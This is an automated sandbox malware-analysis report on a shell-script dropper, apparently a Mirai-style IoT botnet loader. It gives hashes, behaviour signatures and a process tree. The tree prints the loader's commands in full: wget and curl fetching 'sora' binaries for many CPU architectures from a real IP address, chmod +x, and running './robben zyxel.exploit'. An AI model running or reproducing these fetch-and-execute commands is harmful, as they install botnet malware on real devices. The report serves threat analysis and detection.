Analysis
- max time kernel: 25s
- max time network: 23s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240418-en
- resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 18/10/2024, 03:03

Static task
- static1

Behavioral task
- behavioral1
- Sample: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Resource: ubuntu1804-amd64-20240611-en

Behavioral task
- behavioral2
- Sample: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Resource: debian9-armhf-20240418-en

Behavioral task
- behavioral3
- Sample: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Resource: debian9-mipsbe-20240418-en

Behavioral task
- behavioral4
- Sample: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Resource: debian9-mipsel-20240611-en

General
- Target: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
- Size: 2KB
- MD5: eb7a4e59f642cd5475876f6ef1a09d3a
- SHA1: 9232db0ebfe888067cc85a32b786a7ce41be0a6f
- SHA256: ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
- SHA512: 9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures

- File and Directory Permissions Modification (1 TTPs, 14 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  784   chmod
  851   chmod
  907   chmod
  871   chmod
  877   chmod
  766   chmod
  801   chmod
  865   chmod
  772   chmod
  778   chmod
  818   chmod
  832   chmod
  859   chmod
  892   chmod

- Executes dropped EXE (14 IoCs)
  ioc           pid   Process
  /tmp/robben   767   robben
  /tmp/robben   773   robben
  /tmp/robben   779   robben
  /tmp/robben   786   robben
  /tmp/robben   803   robben
  /tmp/robben   819   robben
  /tmp/robben   833   robben
  /tmp/robben   852   robben
  /tmp/robben   860   robben
  /tmp/robben   866   robben
  /tmp/robben   872   robben
  /tmp/robben   878   robben
  /tmp/robben   894   robben
  /tmp/robben   908   robben

- Reads runtime system information (14 IoCs)
  description                ioc                              Process
  File opened for reading    /proc/sys/crypto/fips_enabled    curl
  (14 identical entries, one per curl process in the process tree below)

- System Network Configuration Discovery (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  769   wget
  770   curl
  771   cat

- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description                     ioc           Process
  File opened for modification    /tmp/robben   ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
(format: PID, process path, command line; signatures in square brackets; indentation shows tree depth)

PID 735  /tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh: /tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh  [Writes file to tmp directory]
  PID 739  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86
  PID 748  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86  [Reads runtime system information]
  PID 765  /bin/cat: cat sora.x86
  PID 766  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 767  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 769  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mips  [System Network Configuration Discovery]
  PID 770  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mips  [Reads runtime system information; System Network Configuration Discovery]
  PID 771  /bin/cat: cat sora.mips  [System Network Configuration Discovery]
  PID 772  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 773  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 775  /usr/bin/wget: wget http://93.123.85.141/bins/sora.x86_64
  PID 776  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.x86_64  [Reads runtime system information]
  PID 777  /bin/cat: cat sora.x86_64
  PID 778  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 779  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 781  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i468
  PID 782  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i468  [Reads runtime system information]
  PID 783  /bin/cat: cat sora.i468
  PID 784  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 786  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 789  /usr/bin/wget: wget http://93.123.85.141/bins/sora.i686
  PID 792  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.i686  [Reads runtime system information]
  PID 799  /bin/cat: cat sora.i686
  PID 801  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 803  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 805  /usr/bin/wget: wget http://93.123.85.141/bins/sora.mpsl
  PID 808  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.mpsl  [Reads runtime system information]
  PID 815  /bin/cat: cat sora.mpsl
  PID 818  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 819  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 821  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm4
  PID 825  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm4  [Reads runtime system information]
  PID 829  /bin/cat: cat sora.arm4
  PID 832  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 833  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 836  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm5
  PID 839  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm5  [Reads runtime system information]
  PID 849  /bin/cat: cat sora.arm5
  PID 851  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 852  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 854  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm6
  PID 856  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm6  [Reads runtime system information]
  PID 858  /bin/cat: cat sora.arm6
  PID 859  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 860  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 862  /usr/bin/wget: wget http://93.123.85.141/bins/sora.arm7
  PID 863  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.arm7  [Reads runtime system information]
  PID 864  /bin/cat: cat sora.arm7
  PID 865  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 866  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 868  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc
  PID 869  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc  [Reads runtime system information]
  PID 870  /bin/cat: cat sora.ppc
  PID 871  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 872  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 874  /usr/bin/wget: wget http://93.123.85.141/bins/sora.ppc440fp
  PID 875  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.ppc440fp  [Reads runtime system information]
  PID 876  /bin/cat: cat sora.ppc440fp
  PID 877  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 878  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 880  /usr/bin/wget: wget http://93.123.85.141/bins/sora.m68k
  PID 883  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.m68k  [Reads runtime system information]
  PID 890  /bin/cat: cat sora.m68k
  PID 892  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 894  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]
  PID 896  /usr/bin/wget: wget http://93.123.85.141/bins/sora.sh4
  PID 899  /usr/bin/curl: curl -O http://93.123.85.141/bins/sora.sh4  [Reads runtime system information]
  PID 905  /bin/cat: cat sora.sh4
  PID 907  /bin/chmod: chmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP  [File and Directory Permissions Modification]
  PID 908  /tmp/robben: ./robben zyxel.exploit  [Executes dropped EXE]